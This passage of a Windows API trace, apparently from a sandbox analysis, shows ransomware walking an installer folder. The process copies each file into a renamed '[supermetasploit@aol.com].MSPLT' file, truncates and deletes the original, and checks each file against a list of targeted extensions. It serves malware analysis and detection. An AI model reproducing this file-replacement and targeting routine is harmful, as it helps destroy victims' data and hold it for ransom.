(lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.512] lstrlenW (lpString="LocalizedData.xml") returned 17 [0172.512] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.512] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=79996) returned 1 [0172.513] CloseHandle (hObject=0x384) returned 1 [0172.513] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 0x80 [0172.513] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.513] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.513] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.513] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.513] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.513] GetLastError () returned 0x0 [0172.513] ReadFile (in: hFile=0x384, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x1387c, lpOverlapped=0x0) returned 1 [0172.516] WriteFile (in: hFile=0x344, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13880, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13880, lpOverlapped=0x0) returned 1 [0172.519] ReadFile (in: hFile=0x384, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0172.519] WriteFile (in: hFile=0x344, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0172.519] SetEndOfFile (hFile=0x344) returned 1 [0172.519] CloseHandle (hObject=0x344) returned 1 [0172.861] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.861] SetEndOfFile (hFile=0x384) returned 1 [0172.862] CloseHandle (hObject=0x384) returned 1 [0172.862] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.862] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 1 [0172.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.863] lstrlenW (lpString=".doc") returned 4 [0172.863] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString=".docx") returned 5 [0172.863] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.863] lstrlenW (lpString=".pdf") returned 4 [0172.863] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString=".xls") returned 4 [0172.863] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString=".xlsx") returned 5 [0172.863] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.863] lstrlenW (lpString=".ppt") returned 4 [0172.863] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.863] lstrlenW (lpString=".zip") returned 4 [0172.863] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.863] lstrlenW (lpString=".rar") returned 4 [0172.863] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString=".bz2") returned 4 [0172.863] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString=".7z") returned 3 [0172.863] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.863] lstrlenW (lpString=".dbf") returned 4 [0172.863] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.863] lstrlenW (lpString=".1cd") returned 4 [0172.863] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.863] lstrlenW (lpString=".jpg") returned 4 [0172.863] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.863] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.864] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.864] lstrlenW (lpString=".doc") returned 4 [0172.864] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.864] lstrlenW (lpString=".docx") returned 5 [0172.864] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.864] lstrlenW (lpString=".pdf") returned 4 [0172.864] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.864] lstrlenW (lpString=".xls") returned 4 [0172.864] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.864] lstrlenW (lpString=".xlsx") returned 5 [0172.864] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.864] lstrlenW (lpString=".ppt") returned 4 [0172.864] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.864] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.864] lstrlenW (lpString=".zip") returned 4 [0172.864] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.864] lstrlenW (lpString=".rar") returned 4 [0172.864] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.904] lstrlenW (lpString=".bz2") returned 4 [0172.904] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.904] lstrlenW (lpString=".7z") returned 3 [0172.904] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.904] lstrlenW (lpString=".dbf") returned 4 [0172.904] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.905] lstrlenW (lpString=".1cd") returned 4 [0172.905] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.905] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0172.905] lstrlenW (lpString=".jpg") returned 4 [0172.905] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.905] lstrcmpiW (lpString1=".xsd", lpString2=".MSPLT") returned 1 [0172.905] lstrlenW (lpString="SetupUi.xsd") returned 11 [0172.905] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.905] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=30120) returned 1 [0172.905] CloseHandle (hObject=0x348) returned 1 [0172.905] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 0x80 [0172.905] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.905] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.905] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.906] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.906] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0172.906] GetLastError () returned 0x0 [0172.906] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x75a8, lpOverlapped=0x0) returned 1 [0172.946] WriteFile (in: hFile=0x36c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x75b0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x75b0, lpOverlapped=0x0) returned 1 [0172.947] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0172.948] WriteFile (in: hFile=0x36c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xea, lpOverlapped=0x0) returned 1 [0172.948] SetEndOfFile (hFile=0x36c) returned 1 [0172.948] CloseHandle (hObject=0x36c) returned 1 [0172.953] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.953] SetEndOfFile (hFile=0x348) returned 1 [0172.954] CloseHandle (hObject=0x348) returned 1 [0172.954] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.955] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 1 [0172.955] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.955] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.955] lstrlenW (lpString=".doc") returned 4 [0172.955] lstrcmpiW (lpString1=".doc", lpString2=".xsd") returned -1 [0172.955] lstrlenW (lpString=".docx") returned 5 [0172.955] lstrcmpiW (lpString1=".docx", lpString2="i.xsd") returned -1 [0172.955] lstrlenW (lpString=".pdf") returned 4 [0172.955] lstrcmpiW (lpString1=".pdf", lpString2=".xsd") returned -1 [0172.955] lstrlenW (lpString=".xls") returned 4 [0172.955] lstrcmpiW (lpString1=".xls", lpString2=".xsd") returned -1 [0172.956] lstrlenW (lpString=".xlsx") returned 5 [0172.956] lstrcmpiW (lpString1=".xlsx", lpString2="i.xsd") returned -1 [0172.956] lstrlenW (lpString=".ppt") returned 4 [0172.956] lstrcmpiW (lpString1=".ppt", lpString2=".xsd") returned -1 [0172.956] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.956] lstrlenW (lpString=".zip") returned 4 [0172.956] lstrcmpiW (lpString1=".zip", lpString2=".xsd") returned 1 [0172.956] lstrlenW (lpString=".rar") returned 4 [0172.956] lstrcmpiW (lpString1=".rar", lpString2=".xsd") returned -1 [0172.956] lstrlenW (lpString=".bz2") returned 4 [0172.956] lstrcmpiW (lpString1=".bz2", lpString2=".xsd") returned -1 [0172.956] lstrlenW (lpString=".7z") returned 3 [0172.956] lstrcmpiW (lpString1=".7z", lpString2="xsd") returned -1 [0172.956] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.956] lstrlenW (lpString=".dbf") returned 4 [0172.956] lstrcmpiW (lpString1=".dbf", lpString2=".xsd") returned -1 [0172.956] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.956] lstrlenW (lpString=".1cd") returned 4 [0172.956] lstrcmpiW (lpString1=".1cd", lpString2=".xsd") returned -1 [0172.956] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.956] lstrlenW (lpString=".jpg") returned 4 [0172.956] lstrcmpiW (lpString1=".jpg", lpString2=".xsd") returned -1 [0172.956] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.956] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.956] lstrlenW (lpString=".doc") returned 4 [0172.956] lstrcmpiW (lpString1=".doc", lpString2=".xsd") returned -1 [0172.956] lstrlenW (lpString=".docx") returned 5 [0172.956] lstrcmpiW (lpString1=".docx", lpString2="i.xsd") returned -1 [0172.957] lstrlenW (lpString=".pdf") returned 4 [0172.957] lstrcmpiW (lpString1=".pdf", lpString2=".xsd") returned -1 [0172.957] lstrlenW (lpString=".xls") returned 4 [0172.957] lstrcmpiW (lpString1=".xls", lpString2=".xsd") returned -1 [0172.957] lstrlenW (lpString=".xlsx") returned 5 [0172.957] lstrcmpiW (lpString1=".xlsx", lpString2="i.xsd") returned -1 [0172.957] lstrlenW (lpString=".ppt") returned 4 [0172.957] lstrcmpiW (lpString1=".ppt", lpString2=".xsd") returned -1 [0172.957] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.957] lstrlenW (lpString=".zip") returned 4 [0172.957] lstrcmpiW (lpString1=".zip", lpString2=".xsd") returned 1 [0172.957] lstrlenW (lpString=".rar") returned 4 [0172.957] lstrcmpiW (lpString1=".rar", lpString2=".xsd") returned -1 [0172.957] lstrlenW (lpString=".bz2") returned 4 [0172.957] lstrcmpiW (lpString1=".bz2", lpString2=".xsd") returned -1 [0172.957] lstrlenW (lpString=".7z") returned 3 [0172.957] lstrcmpiW (lpString1=".7z", lpString2="xsd") returned -1 [0172.957] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.957] lstrlenW (lpString=".dbf") returned 4 [0172.957] lstrcmpiW (lpString1=".dbf", lpString2=".xsd") returned -1 [0172.957] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.957] lstrlenW (lpString=".1cd") returned 4 [0172.957] lstrcmpiW (lpString1=".1cd", lpString2=".xsd") returned -1 [0172.957] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0172.957] lstrlenW (lpString=".jpg") returned 4 [0172.957] lstrcmpiW (lpString1=".jpg", lpString2=".xsd") returned -1 [0172.958] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.958] lstrlenW (lpString="Strings.xml") returned 11 [0172.958] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.958] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=14084) returned 1 [0172.958] CloseHandle (hObject=0x348) returned 1 [0172.958] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 0x80 [0172.958] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\strings.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.958] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.959] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.959] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.959] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\strings.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0172.959] GetLastError () returned 0x0 [0172.959] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x3704, lpOverlapped=0x0) returned 1 [0172.989] WriteFile (in: hFile=0x36c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x3710, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x3710, lpOverlapped=0x0) returned 1 [0172.991] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0172.991] WriteFile (in: hFile=0x36c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xea, lpOverlapped=0x0) returned 1 [0172.991] SetEndOfFile (hFile=0x36c) returned 1 [0172.991] CloseHandle (hObject=0x36c) returned 1 [0172.992] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.993] SetEndOfFile (hFile=0x348) returned 1 [0172.994] CloseHandle (hObject=0x348) returned 1 [0172.994] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.994] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 1 [0172.994] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.995] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.995] lstrlenW (lpString=".doc") returned 4 [0172.995] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.995] lstrlenW (lpString=".docx") returned 5 [0172.995] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0172.995] lstrlenW (lpString=".pdf") returned 4 [0172.995] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.995] lstrlenW (lpString=".xls") returned 4 [0172.995] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.995] lstrlenW (lpString=".xlsx") returned 5 [0172.995] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0172.995] lstrlenW (lpString=".ppt") returned 4 [0172.995] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.995] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.995] lstrlenW (lpString=".zip") returned 4 [0172.995] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.995] lstrlenW (lpString=".rar") returned 4 [0172.995] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.995] lstrlenW (lpString=".bz2") returned 4 [0172.995] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.995] lstrlenW (lpString=".7z") returned 3 [0172.995] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.995] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.995] lstrlenW (lpString=".dbf") returned 4 [0172.995] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.995] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.995] lstrlenW (lpString=".1cd") returned 4 [0172.996] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.996] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.996] lstrlenW (lpString=".jpg") returned 4 [0172.996] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.996] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.996] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.996] lstrlenW (lpString=".doc") returned 4 [0172.996] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.996] lstrlenW (lpString=".docx") returned 5 [0172.996] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0172.996] lstrlenW (lpString=".pdf") returned 4 [0172.996] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.996] lstrlenW (lpString=".xls") returned 4 [0172.996] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.996] lstrlenW (lpString=".xlsx") returned 5 [0172.996] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0172.996] lstrlenW (lpString=".ppt") returned 4 [0172.996] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.996] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.996] lstrlenW (lpString=".zip") returned 4 [0172.996] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.996] lstrlenW (lpString=".rar") returned 4 [0172.996] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.996] lstrlenW (lpString=".bz2") returned 4 [0172.996] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.997] lstrlenW (lpString=".7z") returned 3 [0172.997] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.997] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.997] lstrlenW (lpString=".dbf") returned 4 [0172.997] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.997] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.997] lstrlenW (lpString=".1cd") returned 4 [0172.997] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.997] lstrlenW (lpString="C:\\588bce7c90097ed212\\Strings.xml") returned 33 [0172.997] lstrlenW (lpString=".jpg") returned 4 [0172.997] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.997] lstrcmpiW (lpString1=".bmp", lpString2=".MSPLT") returned -1 [0172.997] lstrlenW (lpString="watermark.bmp") returned 13 [0172.997] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.998] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=104072) returned 1 [0172.998] CloseHandle (hObject=0x348) returned 1 [0172.998] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 0x80 [0172.998] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.998] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.998] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.998] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.998] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0172.999] GetLastError () returned 0x0 [0172.999] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x19688, lpOverlapped=0x0) returned 1 [0173.166] WriteFile (in: hFile=0x36c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x19690, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x19690, lpOverlapped=0x0) returned 1 [0173.169] ReadFile (in: hFile=0x348, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0173.169] WriteFile (in: hFile=0x36c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xee, lpOverlapped=0x0) returned 1 [0173.170] SetEndOfFile (hFile=0x36c) returned 1 [0173.170] CloseHandle (hObject=0x36c) returned 1 [0173.336] SetFilePointerEx (in: 